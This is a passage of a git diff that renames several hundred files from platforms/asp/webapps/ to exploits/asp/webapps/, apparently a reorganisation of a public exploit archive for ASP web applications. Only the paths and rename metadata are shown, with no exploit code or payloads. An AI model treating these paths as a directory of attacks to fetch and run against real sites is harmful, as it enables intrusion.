b/exploits/asp/webapps/25981.txt similarity index 100% rename from platforms/asp/webapps/25981.txt rename to exploits/asp/webapps/25981.txt diff --git a/platforms/asp/webapps/26033.txt b/exploits/asp/webapps/26033.txt similarity index 100% rename from platforms/asp/webapps/26033.txt rename to exploits/asp/webapps/26033.txt diff --git a/platforms/asp/webapps/26069.txt b/exploits/asp/webapps/26069.txt similarity index 100% rename from platforms/asp/webapps/26069.txt rename to exploits/asp/webapps/26069.txt diff --git a/platforms/asp/webapps/26070.txt b/exploits/asp/webapps/26070.txt similarity index 100% rename from platforms/asp/webapps/26070.txt rename to exploits/asp/webapps/26070.txt diff --git a/platforms/asp/webapps/26107.txt b/exploits/asp/webapps/26107.txt similarity index 100% rename from platforms/asp/webapps/26107.txt rename to exploits/asp/webapps/26107.txt diff --git a/platforms/asp/webapps/26108.txt b/exploits/asp/webapps/26108.txt similarity index 100% rename from platforms/asp/webapps/26108.txt rename to exploits/asp/webapps/26108.txt diff --git a/platforms/asp/webapps/26109.txt b/exploits/asp/webapps/26109.txt similarity index 100% rename from platforms/asp/webapps/26109.txt rename to exploits/asp/webapps/26109.txt diff --git a/platforms/asp/webapps/26154.txt b/exploits/asp/webapps/26154.txt similarity index 100% rename from platforms/asp/webapps/26154.txt rename to exploits/asp/webapps/26154.txt diff --git a/platforms/asp/webapps/26156.txt b/exploits/asp/webapps/26156.txt similarity index 100% rename from platforms/asp/webapps/26156.txt rename to exploits/asp/webapps/26156.txt diff --git a/platforms/asp/webapps/26291.txt b/exploits/asp/webapps/26291.txt similarity index 100% rename from platforms/asp/webapps/26291.txt rename to exploits/asp/webapps/26291.txt diff --git a/platforms/asp/webapps/26333.html b/exploits/asp/webapps/26333.html similarity index 100% rename from platforms/asp/webapps/26333.html rename to exploits/asp/webapps/26333.html diff --git a/platforms/asp/webapps/26334.txt b/exploits/asp/webapps/26334.txt similarity index 100% rename from platforms/asp/webapps/26334.txt rename to exploits/asp/webapps/26334.txt diff --git a/platforms/asp/webapps/26335.txt b/exploits/asp/webapps/26335.txt similarity index 100% rename from platforms/asp/webapps/26335.txt rename to exploits/asp/webapps/26335.txt diff --git a/platforms/asp/webapps/26351.txt b/exploits/asp/webapps/26351.txt similarity index 100% rename from platforms/asp/webapps/26351.txt rename to exploits/asp/webapps/26351.txt diff --git a/platforms/asp/webapps/2642.asp b/exploits/asp/webapps/2642.asp similarity index 100% rename from platforms/asp/webapps/2642.asp rename to exploits/asp/webapps/2642.asp diff --git a/platforms/asp/webapps/26426.html b/exploits/asp/webapps/26426.html similarity index 100% rename from platforms/asp/webapps/26426.html rename to exploits/asp/webapps/26426.html diff --git a/platforms/asp/webapps/26429.txt b/exploits/asp/webapps/26429.txt similarity index 100% rename from platforms/asp/webapps/26429.txt rename to exploits/asp/webapps/26429.txt diff --git a/platforms/asp/webapps/26430.txt b/exploits/asp/webapps/26430.txt similarity index 100% rename from platforms/asp/webapps/26430.txt rename to exploits/asp/webapps/26430.txt diff --git a/platforms/asp/webapps/26435.txt b/exploits/asp/webapps/26435.txt similarity index 100% rename from platforms/asp/webapps/26435.txt rename to exploits/asp/webapps/26435.txt diff --git a/platforms/asp/webapps/26439.txt b/exploits/asp/webapps/26439.txt similarity index 100% rename from platforms/asp/webapps/26439.txt rename to exploits/asp/webapps/26439.txt diff --git a/platforms/asp/webapps/26444.txt b/exploits/asp/webapps/26444.txt similarity index 100% rename from platforms/asp/webapps/26444.txt rename to exploits/asp/webapps/26444.txt diff --git a/platforms/asp/webapps/26445.pl b/exploits/asp/webapps/26445.pl similarity index 100% rename from platforms/asp/webapps/26445.pl rename to exploits/asp/webapps/26445.pl diff --git a/platforms/asp/webapps/26473.txt b/exploits/asp/webapps/26473.txt similarity index 100% rename from platforms/asp/webapps/26473.txt rename to exploits/asp/webapps/26473.txt diff --git a/platforms/asp/webapps/26537.html b/exploits/asp/webapps/26537.html similarity index 100% rename from platforms/asp/webapps/26537.html rename to exploits/asp/webapps/26537.html diff --git a/platforms/asp/webapps/2661.asp b/exploits/asp/webapps/2661.asp similarity index 100% rename from platforms/asp/webapps/2661.asp rename to exploits/asp/webapps/2661.asp diff --git a/platforms/asp/webapps/2662.txt b/exploits/asp/webapps/2662.txt similarity index 100% rename from platforms/asp/webapps/2662.txt rename to exploits/asp/webapps/2662.txt diff --git a/platforms/asp/webapps/26701.txt b/exploits/asp/webapps/26701.txt similarity index 100% rename from platforms/asp/webapps/26701.txt rename to exploits/asp/webapps/26701.txt diff --git a/platforms/asp/webapps/26702.txt b/exploits/asp/webapps/26702.txt similarity index 100% rename from platforms/asp/webapps/26702.txt rename to exploits/asp/webapps/26702.txt diff --git a/platforms/asp/webapps/26704.txt b/exploits/asp/webapps/26704.txt similarity index 100% rename from platforms/asp/webapps/26704.txt rename to exploits/asp/webapps/26704.txt diff --git a/platforms/asp/webapps/26705.txt b/exploits/asp/webapps/26705.txt similarity index 100% rename from platforms/asp/webapps/26705.txt rename to exploits/asp/webapps/26705.txt diff --git a/platforms/asp/webapps/26742.txt b/exploits/asp/webapps/26742.txt similarity index 100% rename from platforms/asp/webapps/26742.txt rename to exploits/asp/webapps/26742.txt diff --git a/platforms/asp/webapps/26743.txt b/exploits/asp/webapps/26743.txt similarity index 100% rename from platforms/asp/webapps/26743.txt rename to exploits/asp/webapps/26743.txt diff --git a/platforms/asp/webapps/26744.txt b/exploits/asp/webapps/26744.txt similarity index 100% rename from platforms/asp/webapps/26744.txt rename to exploits/asp/webapps/26744.txt diff --git a/platforms/asp/webapps/26745.txt b/exploits/asp/webapps/26745.txt similarity index 100% rename from platforms/asp/webapps/26745.txt rename to exploits/asp/webapps/26745.txt diff --git a/platforms/asp/webapps/26746.txt b/exploits/asp/webapps/26746.txt similarity index 100% rename from platforms/asp/webapps/26746.txt rename to exploits/asp/webapps/26746.txt diff --git a/platforms/asp/webapps/26747.txt b/exploits/asp/webapps/26747.txt similarity index 100% rename from platforms/asp/webapps/26747.txt rename to exploits/asp/webapps/26747.txt diff --git a/platforms/asp/webapps/26759.txt b/exploits/asp/webapps/26759.txt similarity index 100% rename from platforms/asp/webapps/26759.txt rename to exploits/asp/webapps/26759.txt diff --git a/platforms/asp/webapps/26760.txt b/exploits/asp/webapps/26760.txt similarity index 100% rename from platforms/asp/webapps/26760.txt rename to exploits/asp/webapps/26760.txt diff --git a/platforms/asp/webapps/26777.txt b/exploits/asp/webapps/26777.txt similarity index 100% rename from platforms/asp/webapps/26777.txt rename to exploits/asp/webapps/26777.txt diff --git a/platforms/asp/webapps/26806.txt b/exploits/asp/webapps/26806.txt similarity index 100% rename from platforms/asp/webapps/26806.txt rename to exploits/asp/webapps/26806.txt diff --git a/platforms/asp/webapps/26820.txt b/exploits/asp/webapps/26820.txt similarity index 100% rename from platforms/asp/webapps/26820.txt rename to exploits/asp/webapps/26820.txt diff --git a/platforms/asp/webapps/26821.txt b/exploits/asp/webapps/26821.txt similarity index 100% rename from platforms/asp/webapps/26821.txt rename to exploits/asp/webapps/26821.txt diff --git a/platforms/asp/webapps/26822.txt b/exploits/asp/webapps/26822.txt similarity index 100% rename from platforms/asp/webapps/26822.txt rename to exploits/asp/webapps/26822.txt diff --git a/platforms/asp/webapps/26823.txt b/exploits/asp/webapps/26823.txt similarity index 100% rename from platforms/asp/webapps/26823.txt rename to exploits/asp/webapps/26823.txt diff --git a/platforms/asp/webapps/2683.txt b/exploits/asp/webapps/2683.txt similarity index 100% rename from platforms/asp/webapps/2683.txt rename to exploits/asp/webapps/2683.txt diff --git a/platforms/asp/webapps/2684.txt b/exploits/asp/webapps/2684.txt similarity index 100% rename from platforms/asp/webapps/2684.txt rename to exploits/asp/webapps/2684.txt diff --git a/platforms/asp/webapps/26873.txt b/exploits/asp/webapps/26873.txt similarity index 100% rename from platforms/asp/webapps/26873.txt rename to exploits/asp/webapps/26873.txt diff --git a/platforms/asp/webapps/26874.txt b/exploits/asp/webapps/26874.txt similarity index 100% rename from platforms/asp/webapps/26874.txt rename to exploits/asp/webapps/26874.txt diff --git a/platforms/asp/webapps/26875.txt b/exploits/asp/webapps/26875.txt similarity index 100% rename from platforms/asp/webapps/26875.txt rename to exploits/asp/webapps/26875.txt diff --git a/platforms/asp/webapps/26876.txt b/exploits/asp/webapps/26876.txt similarity index 100% rename from platforms/asp/webapps/26876.txt rename to exploits/asp/webapps/26876.txt diff --git a/platforms/asp/webapps/26903.txt b/exploits/asp/webapps/26903.txt similarity index 100% rename from platforms/asp/webapps/26903.txt rename to exploits/asp/webapps/26903.txt diff --git a/platforms/asp/webapps/26926.txt b/exploits/asp/webapps/26926.txt similarity index 100% rename from platforms/asp/webapps/26926.txt rename to exploits/asp/webapps/26926.txt diff --git a/platforms/asp/webapps/26927.txt b/exploits/asp/webapps/26927.txt similarity index 100% rename from platforms/asp/webapps/26927.txt rename to exploits/asp/webapps/26927.txt diff --git a/platforms/asp/webapps/26928.txt b/exploits/asp/webapps/26928.txt similarity index 100% rename from platforms/asp/webapps/26928.txt rename to exploits/asp/webapps/26928.txt diff --git a/platforms/asp/webapps/26929.txt b/exploits/asp/webapps/26929.txt similarity index 100% rename from platforms/asp/webapps/26929.txt rename to exploits/asp/webapps/26929.txt diff --git a/platforms/asp/webapps/26930.txt b/exploits/asp/webapps/26930.txt similarity index 100% rename from platforms/asp/webapps/26930.txt rename to exploits/asp/webapps/26930.txt diff --git a/platforms/asp/webapps/26931.txt b/exploits/asp/webapps/26931.txt similarity index 100% rename from platforms/asp/webapps/26931.txt rename to exploits/asp/webapps/26931.txt diff --git a/platforms/asp/webapps/26932.txt b/exploits/asp/webapps/26932.txt similarity index 100% rename from platforms/asp/webapps/26932.txt rename to exploits/asp/webapps/26932.txt diff --git a/platforms/asp/webapps/26934.txt b/exploits/asp/webapps/26934.txt similarity index 100% rename from platforms/asp/webapps/26934.txt rename to exploits/asp/webapps/26934.txt diff --git a/platforms/asp/webapps/26935.txt b/exploits/asp/webapps/26935.txt similarity index 100% rename from platforms/asp/webapps/26935.txt rename to exploits/asp/webapps/26935.txt diff --git a/platforms/asp/webapps/26936.txt b/exploits/asp/webapps/26936.txt similarity index 100% rename from platforms/asp/webapps/26936.txt rename to exploits/asp/webapps/26936.txt diff --git a/platforms/asp/webapps/26940.txt b/exploits/asp/webapps/26940.txt similarity index 100% rename from platforms/asp/webapps/26940.txt rename to exploits/asp/webapps/26940.txt diff --git a/platforms/asp/webapps/26941.txt b/exploits/asp/webapps/26941.txt similarity index 100% rename from platforms/asp/webapps/26941.txt rename to exploits/asp/webapps/26941.txt diff --git a/platforms/asp/webapps/26942.txt b/exploits/asp/webapps/26942.txt similarity index 100% rename from platforms/asp/webapps/26942.txt rename to exploits/asp/webapps/26942.txt diff --git a/platforms/asp/webapps/26943.txt b/exploits/asp/webapps/26943.txt similarity index 100% rename from platforms/asp/webapps/26943.txt rename to exploits/asp/webapps/26943.txt diff --git a/platforms/asp/webapps/26944.txt b/exploits/asp/webapps/26944.txt similarity index 100% rename from platforms/asp/webapps/26944.txt rename to exploits/asp/webapps/26944.txt diff --git a/platforms/asp/webapps/26945.txt b/exploits/asp/webapps/26945.txt similarity index 100% rename from platforms/asp/webapps/26945.txt rename to exploits/asp/webapps/26945.txt diff --git a/platforms/asp/webapps/26946.txt b/exploits/asp/webapps/26946.txt similarity index 100% rename from platforms/asp/webapps/26946.txt rename to exploits/asp/webapps/26946.txt diff --git a/platforms/asp/webapps/26947.txt b/exploits/asp/webapps/26947.txt similarity index 100% rename from platforms/asp/webapps/26947.txt rename to exploits/asp/webapps/26947.txt diff --git a/platforms/asp/webapps/26948.txt b/exploits/asp/webapps/26948.txt similarity index 100% rename from platforms/asp/webapps/26948.txt rename to exploits/asp/webapps/26948.txt diff --git a/platforms/asp/webapps/26949.txt b/exploits/asp/webapps/26949.txt similarity index 100% rename from platforms/asp/webapps/26949.txt rename to exploits/asp/webapps/26949.txt diff --git a/platforms/asp/webapps/26963.txt b/exploits/asp/webapps/26963.txt similarity index 100% rename from platforms/asp/webapps/26963.txt rename to exploits/asp/webapps/26963.txt diff --git a/platforms/asp/webapps/26964.txt b/exploits/asp/webapps/26964.txt similarity index 100% rename from platforms/asp/webapps/26964.txt rename to exploits/asp/webapps/26964.txt diff --git a/platforms/asp/webapps/26969.txt b/exploits/asp/webapps/26969.txt similarity index 100% rename from platforms/asp/webapps/26969.txt rename to exploits/asp/webapps/26969.txt diff --git a/platforms/asp/webapps/26991.html b/exploits/asp/webapps/26991.html similarity index 100% rename from platforms/asp/webapps/26991.html rename to exploits/asp/webapps/26991.html diff --git a/platforms/asp/webapps/27034.txt b/exploits/asp/webapps/27034.txt similarity index 100% rename from platforms/asp/webapps/27034.txt rename to exploits/asp/webapps/27034.txt diff --git a/platforms/asp/webapps/27035.txt b/exploits/asp/webapps/27035.txt similarity index 100% rename from platforms/asp/webapps/27035.txt rename to exploits/asp/webapps/27035.txt diff --git a/platforms/asp/webapps/27036.txt b/exploits/asp/webapps/27036.txt similarity index 100% rename from platforms/asp/webapps/27036.txt rename to exploits/asp/webapps/27036.txt diff --git a/platforms/asp/webapps/27063.txt b/exploits/asp/webapps/27063.txt similarity index 100% rename from platforms/asp/webapps/27063.txt rename to exploits/asp/webapps/27063.txt diff --git a/platforms/asp/webapps/27071.txt b/exploits/asp/webapps/27071.txt similarity index 100% rename from platforms/asp/webapps/27071.txt rename to exploits/asp/webapps/27071.txt diff --git a/platforms/asp/webapps/27079.txt b/exploits/asp/webapps/27079.txt similarity index 100% rename from platforms/asp/webapps/27079.txt rename to exploits/asp/webapps/27079.txt diff --git a/platforms/asp/webapps/27083.txt b/exploits/asp/webapps/27083.txt similarity index 100% rename from platforms/asp/webapps/27083.txt rename to exploits/asp/webapps/27083.txt diff --git a/platforms/asp/webapps/27142.txt b/exploits/asp/webapps/27142.txt similarity index 100% rename from platforms/asp/webapps/27142.txt rename to exploits/asp/webapps/27142.txt diff --git a/platforms/asp/webapps/27143.txt b/exploits/asp/webapps/27143.txt similarity index 100% rename from platforms/asp/webapps/27143.txt rename to exploits/asp/webapps/27143.txt diff --git a/platforms/asp/webapps/27151.txt b/exploits/asp/webapps/27151.txt similarity index 100% rename from platforms/asp/webapps/27151.txt rename to exploits/asp/webapps/27151.txt diff --git a/platforms/asp/webapps/27160.txt b/exploits/asp/webapps/27160.txt similarity index 100% rename from platforms/asp/webapps/27160.txt rename to exploits/asp/webapps/27160.txt diff --git a/platforms/asp/webapps/27161.txt b/exploits/asp/webapps/27161.txt similarity index 100% rename from platforms/asp/webapps/27161.txt rename to exploits/asp/webapps/27161.txt diff --git a/platforms/asp/webapps/27169.txt b/exploits/asp/webapps/27169.txt similarity index 100% rename from platforms/asp/webapps/27169.txt rename to exploits/asp/webapps/27169.txt diff --git a/platforms/asp/webapps/27174.txt b/exploits/asp/webapps/27174.txt similarity index 100% rename from platforms/asp/webapps/27174.txt rename to exploits/asp/webapps/27174.txt diff --git a/platforms/asp/webapps/27310.txt b/exploits/asp/webapps/27310.txt similarity index 100% rename from platforms/asp/webapps/27310.txt rename to exploits/asp/webapps/27310.txt diff --git a/platforms/asp/webapps/2746.pl b/exploits/asp/webapps/2746.pl similarity index 100% rename from platforms/asp/webapps/2746.pl rename to exploits/asp/webapps/2746.pl diff --git a/platforms/asp/webapps/27469.txt b/exploits/asp/webapps/27469.txt similarity index 100% rename from platforms/asp/webapps/27469.txt rename to exploits/asp/webapps/27469.txt diff --git a/platforms/asp/webapps/27470.txt b/exploits/asp/webapps/27470.txt similarity index 100% rename from platforms/asp/webapps/27470.txt rename to exploits/asp/webapps/27470.txt diff --git a/platforms/asp/webapps/27471.txt b/exploits/asp/webapps/27471.txt similarity index 100% rename from platforms/asp/webapps/27471.txt rename to exploits/asp/webapps/27471.txt diff --git a/platforms/asp/webapps/27472.txt b/exploits/asp/webapps/27472.txt similarity index 100% rename from platforms/asp/webapps/27472.txt rename to exploits/asp/webapps/27472.txt diff --git a/platforms/asp/webapps/27473.txt b/exploits/asp/webapps/27473.txt similarity index 100% rename from platforms/asp/webapps/27473.txt rename to exploits/asp/webapps/27473.txt diff --git a/platforms/asp/webapps/27479.txt b/exploits/asp/webapps/27479.txt similarity index 100% rename from platforms/asp/webapps/27479.txt rename to exploits/asp/webapps/27479.txt diff --git a/platforms/asp/webapps/27480.txt b/exploits/asp/webapps/27480.txt similarity index 100% rename from platforms/asp/webapps/27480.txt rename to exploits/asp/webapps/27480.txt diff --git a/platforms/asp/webapps/27481.txt b/exploits/asp/webapps/27481.txt similarity index 100% rename from platforms/asp/webapps/27481.txt rename to exploits/asp/webapps/27481.txt diff --git a/platforms/asp/webapps/27482.txt b/exploits/asp/webapps/27482.txt similarity index 100% rename from platforms/asp/webapps/27482.txt rename to exploits/asp/webapps/27482.txt diff --git a/platforms/asp/webapps/27486.txt b/exploits/asp/webapps/27486.txt similarity index 100% rename from platforms/asp/webapps/27486.txt rename to exploits/asp/webapps/27486.txt diff --git a/platforms/asp/webapps/27487.txt b/exploits/asp/webapps/27487.txt similarity index 100% rename from platforms/asp/webapps/27487.txt rename to exploits/asp/webapps/27487.txt diff --git a/platforms/asp/webapps/27536.txt b/exploits/asp/webapps/27536.txt similarity index 100% rename from platforms/asp/webapps/27536.txt rename to exploits/asp/webapps/27536.txt diff --git a/platforms/asp/webapps/2754.pl b/exploits/asp/webapps/2754.pl similarity index 100% rename from platforms/asp/webapps/2754.pl rename to exploits/asp/webapps/2754.pl diff --git a/platforms/asp/webapps/2755.pl b/exploits/asp/webapps/2755.pl similarity index 100% rename from platforms/asp/webapps/2755.pl rename to exploits/asp/webapps/2755.pl diff --git a/platforms/asp/webapps/27552.txt b/exploits/asp/webapps/27552.txt similarity index 100% rename from platforms/asp/webapps/27552.txt rename to exploits/asp/webapps/27552.txt diff --git a/platforms/asp/webapps/2756.txt b/exploits/asp/webapps/2756.txt similarity index 100% rename from platforms/asp/webapps/2756.txt rename to exploits/asp/webapps/2756.txt diff --git a/platforms/asp/webapps/2757.pl b/exploits/asp/webapps/2757.pl similarity index 100% rename from platforms/asp/webapps/2757.pl rename to exploits/asp/webapps/2757.pl diff --git a/platforms/asp/webapps/2761.pl b/exploits/asp/webapps/2761.pl similarity index 100% rename from platforms/asp/webapps/2761.pl rename to exploits/asp/webapps/2761.pl diff --git a/platforms/asp/webapps/2762.asp b/exploits/asp/webapps/2762.asp similarity index 100% rename from platforms/asp/webapps/2762.asp rename to exploits/asp/webapps/2762.asp diff --git a/platforms/asp/webapps/2763.txt b/exploits/asp/webapps/2763.txt similarity index 100% rename from platforms/asp/webapps/2763.txt rename to exploits/asp/webapps/2763.txt diff --git a/platforms/asp/webapps/2764.txt b/exploits/asp/webapps/2764.txt similarity index 100% rename from platforms/asp/webapps/2764.txt rename to exploits/asp/webapps/2764.txt diff --git a/platforms/asp/webapps/2765.txt b/exploits/asp/webapps/2765.txt similarity index 100% rename from platforms/asp/webapps/2765.txt rename to exploits/asp/webapps/2765.txt diff --git a/platforms/asp/webapps/2772.html b/exploits/asp/webapps/2772.html similarity index 100% rename from platforms/asp/webapps/2772.html rename to exploits/asp/webapps/2772.html diff --git a/platforms/asp/webapps/2773.txt b/exploits/asp/webapps/2773.txt similarity index 100% rename from platforms/asp/webapps/2773.txt rename to exploits/asp/webapps/2773.txt diff --git a/platforms/asp/webapps/2774.txt b/exploits/asp/webapps/2774.txt similarity index 100% rename from platforms/asp/webapps/2774.txt rename to exploits/asp/webapps/2774.txt diff --git a/platforms/asp/webapps/27757.txt b/exploits/asp/webapps/27757.txt similarity index 100% rename from platforms/asp/webapps/27757.txt rename to exploits/asp/webapps/27757.txt diff --git a/platforms/asp/webapps/2779.txt b/exploits/asp/webapps/2779.txt similarity index 100% rename from platforms/asp/webapps/2779.txt rename to exploits/asp/webapps/2779.txt diff --git a/platforms/asp/webapps/2780.txt b/exploits/asp/webapps/2780.txt similarity index 100% rename from platforms/asp/webapps/2780.txt rename to exploits/asp/webapps/2780.txt diff --git a/platforms/asp/webapps/2781.txt b/exploits/asp/webapps/2781.txt similarity index 100% rename from platforms/asp/webapps/2781.txt rename to exploits/asp/webapps/2781.txt diff --git a/platforms/asp/webapps/27813.txt b/exploits/asp/webapps/27813.txt similarity index 100% rename from platforms/asp/webapps/27813.txt rename to exploits/asp/webapps/27813.txt diff --git a/platforms/asp/webapps/27814.txt b/exploits/asp/webapps/27814.txt similarity index 100% rename from platforms/asp/webapps/27814.txt rename to exploits/asp/webapps/27814.txt diff --git a/platforms/asp/webapps/27815.txt b/exploits/asp/webapps/27815.txt similarity index 100% rename from platforms/asp/webapps/27815.txt rename to exploits/asp/webapps/27815.txt diff --git a/platforms/asp/webapps/27816.txt b/exploits/asp/webapps/27816.txt similarity index 100% rename from platforms/asp/webapps/27816.txt rename to exploits/asp/webapps/27816.txt diff --git a/platforms/asp/webapps/27817.txt b/exploits/asp/webapps/27817.txt similarity index 100% rename from platforms/asp/webapps/27817.txt rename to exploits/asp/webapps/27817.txt diff --git a/platforms/asp/webapps/2782.txt b/exploits/asp/webapps/2782.txt similarity index 100% rename from platforms/asp/webapps/2782.txt rename to exploits/asp/webapps/2782.txt diff --git a/platforms/asp/webapps/27825.txt b/exploits/asp/webapps/27825.txt similarity index 100% rename from platforms/asp/webapps/27825.txt rename to exploits/asp/webapps/27825.txt diff --git a/platforms/asp/webapps/27826.txt b/exploits/asp/webapps/27826.txt similarity index 100% rename from platforms/asp/webapps/27826.txt rename to exploits/asp/webapps/27826.txt diff --git a/platforms/asp/webapps/27827.txt b/exploits/asp/webapps/27827.txt similarity index 100% rename from platforms/asp/webapps/27827.txt rename to exploits/asp/webapps/27827.txt diff --git a/platforms/asp/webapps/27828.txt b/exploits/asp/webapps/27828.txt similarity index 100% rename from platforms/asp/webapps/27828.txt rename to exploits/asp/webapps/27828.txt diff --git a/platforms/asp/webapps/27842.txt b/exploits/asp/webapps/27842.txt similarity index 100% rename from platforms/asp/webapps/27842.txt rename to exploits/asp/webapps/27842.txt diff --git a/platforms/asp/webapps/27844.txt b/exploits/asp/webapps/27844.txt similarity index 100% rename from platforms/asp/webapps/27844.txt rename to exploits/asp/webapps/27844.txt diff --git a/platforms/asp/webapps/27846.txt b/exploits/asp/webapps/27846.txt similarity index 100% rename from platforms/asp/webapps/27846.txt rename to exploits/asp/webapps/27846.txt diff --git a/platforms/asp/webapps/27849.txt b/exploits/asp/webapps/27849.txt similarity index 100% rename from platforms/asp/webapps/27849.txt rename to exploits/asp/webapps/27849.txt diff --git a/platforms/asp/webapps/27890.txt b/exploits/asp/webapps/27890.txt similarity index 100% rename from platforms/asp/webapps/27890.txt rename to exploits/asp/webapps/27890.txt diff --git a/platforms/asp/webapps/27896.txt b/exploits/asp/webapps/27896.txt similarity index 100% rename from platforms/asp/webapps/27896.txt rename to exploits/asp/webapps/27896.txt diff --git a/platforms/asp/webapps/27897.txt b/exploits/asp/webapps/27897.txt similarity index 100% rename from platforms/asp/webapps/27897.txt rename to exploits/asp/webapps/27897.txt diff --git a/platforms/asp/webapps/27898.txt b/exploits/asp/webapps/27898.txt similarity index 100% rename from platforms/asp/webapps/27898.txt rename to exploits/asp/webapps/27898.txt diff --git a/platforms/asp/webapps/27913.txt b/exploits/asp/webapps/27913.txt similarity index 100% rename from platforms/asp/webapps/27913.txt rename to exploits/asp/webapps/27913.txt diff --git a/platforms/asp/webapps/27918.txt b/exploits/asp/webapps/27918.txt similarity index 100% rename from platforms/asp/webapps/27918.txt rename to exploits/asp/webapps/27918.txt diff --git a/platforms/asp/webapps/27932.txt b/exploits/asp/webapps/27932.txt similarity index 100% rename from platforms/asp/webapps/27932.txt rename to exploits/asp/webapps/27932.txt diff --git a/platforms/asp/webapps/27945.txt b/exploits/asp/webapps/27945.txt similarity index 100% rename from platforms/asp/webapps/27945.txt rename to exploits/asp/webapps/27945.txt diff --git a/platforms/asp/webapps/27960.txt b/exploits/asp/webapps/27960.txt similarity index 100% rename from platforms/asp/webapps/27960.txt rename to exploits/asp/webapps/27960.txt diff --git a/platforms/asp/webapps/28002.txt b/exploits/asp/webapps/28002.txt similarity index 100% rename from platforms/asp/webapps/28002.txt rename to exploits/asp/webapps/28002.txt diff --git a/platforms/asp/webapps/28003.txt b/exploits/asp/webapps/28003.txt similarity index 100% rename from platforms/asp/webapps/28003.txt rename to exploits/asp/webapps/28003.txt diff --git a/platforms/asp/webapps/28004.txt b/exploits/asp/webapps/28004.txt similarity index 100% rename from platforms/asp/webapps/28004.txt rename to exploits/asp/webapps/28004.txt diff --git a/platforms/asp/webapps/28061.txt b/exploits/asp/webapps/28061.txt similarity index 100% rename from platforms/asp/webapps/28061.txt rename to exploits/asp/webapps/28061.txt diff --git a/platforms/asp/webapps/28062.txt b/exploits/asp/webapps/28062.txt similarity index 100% rename from platforms/asp/webapps/28062.txt rename to exploits/asp/webapps/28062.txt diff --git a/platforms/asp/webapps/28086.txt b/exploits/asp/webapps/28086.txt similarity index 100% rename from platforms/asp/webapps/28086.txt rename to exploits/asp/webapps/28086.txt diff --git a/platforms/asp/webapps/2813.txt b/exploits/asp/webapps/2813.txt similarity index 100% rename from platforms/asp/webapps/2813.txt rename to exploits/asp/webapps/2813.txt diff --git a/platforms/asp/webapps/28193.txt b/exploits/asp/webapps/28193.txt similarity index 100% rename from platforms/asp/webapps/28193.txt rename to exploits/asp/webapps/28193.txt diff --git a/platforms/asp/webapps/28203.txt b/exploits/asp/webapps/28203.txt similarity index 100% rename from platforms/asp/webapps/28203.txt rename to exploits/asp/webapps/28203.txt diff --git a/platforms/asp/webapps/28208.txt b/exploits/asp/webapps/28208.txt similarity index 100% rename from platforms/asp/webapps/28208.txt rename to exploits/asp/webapps/28208.txt diff --git a/platforms/asp/webapps/2828.pl b/exploits/asp/webapps/2828.pl similarity index 100% rename from platforms/asp/webapps/2828.pl rename to exploits/asp/webapps/2828.pl diff --git a/platforms/asp/webapps/2829.txt b/exploits/asp/webapps/2829.txt similarity index 100% rename from platforms/asp/webapps/2829.txt rename to exploits/asp/webapps/2829.txt diff --git a/platforms/asp/webapps/2830.txt b/exploits/asp/webapps/2830.txt similarity index 100% rename from platforms/asp/webapps/2830.txt rename to exploits/asp/webapps/2830.txt diff --git a/platforms/asp/webapps/28339.txt b/exploits/asp/webapps/28339.txt similarity index 100% rename from platforms/asp/webapps/28339.txt rename to exploits/asp/webapps/28339.txt diff --git a/platforms/asp/webapps/28385.txt b/exploits/asp/webapps/28385.txt similarity index 100% rename from platforms/asp/webapps/28385.txt rename to exploits/asp/webapps/28385.txt diff --git a/platforms/asp/webapps/28393.txt b/exploits/asp/webapps/28393.txt similarity index 100% rename from platforms/asp/webapps/28393.txt rename to exploits/asp/webapps/28393.txt diff --git a/platforms/asp/webapps/28443.html b/exploits/asp/webapps/28443.html similarity index 100% rename from platforms/asp/webapps/28443.html rename to exploits/asp/webapps/28443.html diff --git a/platforms/asp/webapps/2846.txt b/exploits/asp/webapps/2846.txt similarity index 100% rename from platforms/asp/webapps/2846.txt rename to exploits/asp/webapps/2846.txt diff --git a/platforms/asp/webapps/2848.txt b/exploits/asp/webapps/2848.txt similarity index 100% rename from platforms/asp/webapps/2848.txt rename to exploits/asp/webapps/2848.txt diff --git a/platforms/asp/webapps/2849.txt b/exploits/asp/webapps/2849.txt similarity index 100% rename from platforms/asp/webapps/2849.txt rename to exploits/asp/webapps/2849.txt diff --git a/platforms/asp/webapps/2853.txt b/exploits/asp/webapps/2853.txt similarity index 100% rename from platforms/asp/webapps/2853.txt rename to exploits/asp/webapps/2853.txt diff --git a/platforms/asp/webapps/28566.txt b/exploits/asp/webapps/28566.txt similarity index 100% rename from platforms/asp/webapps/28566.txt rename to exploits/asp/webapps/28566.txt diff --git a/platforms/asp/webapps/28577.txt b/exploits/asp/webapps/28577.txt similarity index 100% rename from platforms/asp/webapps/28577.txt rename to exploits/asp/webapps/28577.txt diff --git a/platforms/asp/webapps/28587.txt b/exploits/asp/webapps/28587.txt similarity index 100% rename from platforms/asp/webapps/28587.txt rename to exploits/asp/webapps/28587.txt diff --git a/platforms/asp/webapps/28589.txt b/exploits/asp/webapps/28589.txt similarity index 100% rename from platforms/asp/webapps/28589.txt rename to exploits/asp/webapps/28589.txt diff --git a/platforms/asp/webapps/28593.txt b/exploits/asp/webapps/28593.txt similarity index 100% rename from platforms/asp/webapps/28593.txt rename to exploits/asp/webapps/28593.txt diff --git a/platforms/asp/webapps/28597.txt b/exploits/asp/webapps/28597.txt similarity index 100% rename from platforms/asp/webapps/28597.txt rename to exploits/asp/webapps/28597.txt diff --git a/platforms/asp/webapps/28600.txt b/exploits/asp/webapps/28600.txt similarity index 100% rename from platforms/asp/webapps/28600.txt rename to exploits/asp/webapps/28600.txt diff --git a/platforms/asp/webapps/28615.txt b/exploits/asp/webapps/28615.txt similarity index 100% rename from platforms/asp/webapps/28615.txt rename to exploits/asp/webapps/28615.txt diff --git a/platforms/asp/webapps/28742.txt b/exploits/asp/webapps/28742.txt similarity index 100% rename from platforms/asp/webapps/28742.txt rename to exploits/asp/webapps/28742.txt diff --git a/platforms/asp/webapps/28762.txt b/exploits/asp/webapps/28762.txt similarity index 100% rename from platforms/asp/webapps/28762.txt rename to exploits/asp/webapps/28762.txt diff --git a/platforms/asp/webapps/28768.html b/exploits/asp/webapps/28768.html similarity index 100% rename from platforms/asp/webapps/28768.html rename to exploits/asp/webapps/28768.html diff --git a/platforms/asp/webapps/2881.txt b/exploits/asp/webapps/2881.txt similarity index 100% rename from platforms/asp/webapps/2881.txt rename to exploits/asp/webapps/2881.txt diff --git a/platforms/asp/webapps/28829.txt b/exploits/asp/webapps/28829.txt similarity index 100% rename from platforms/asp/webapps/28829.txt rename to exploits/asp/webapps/28829.txt diff --git 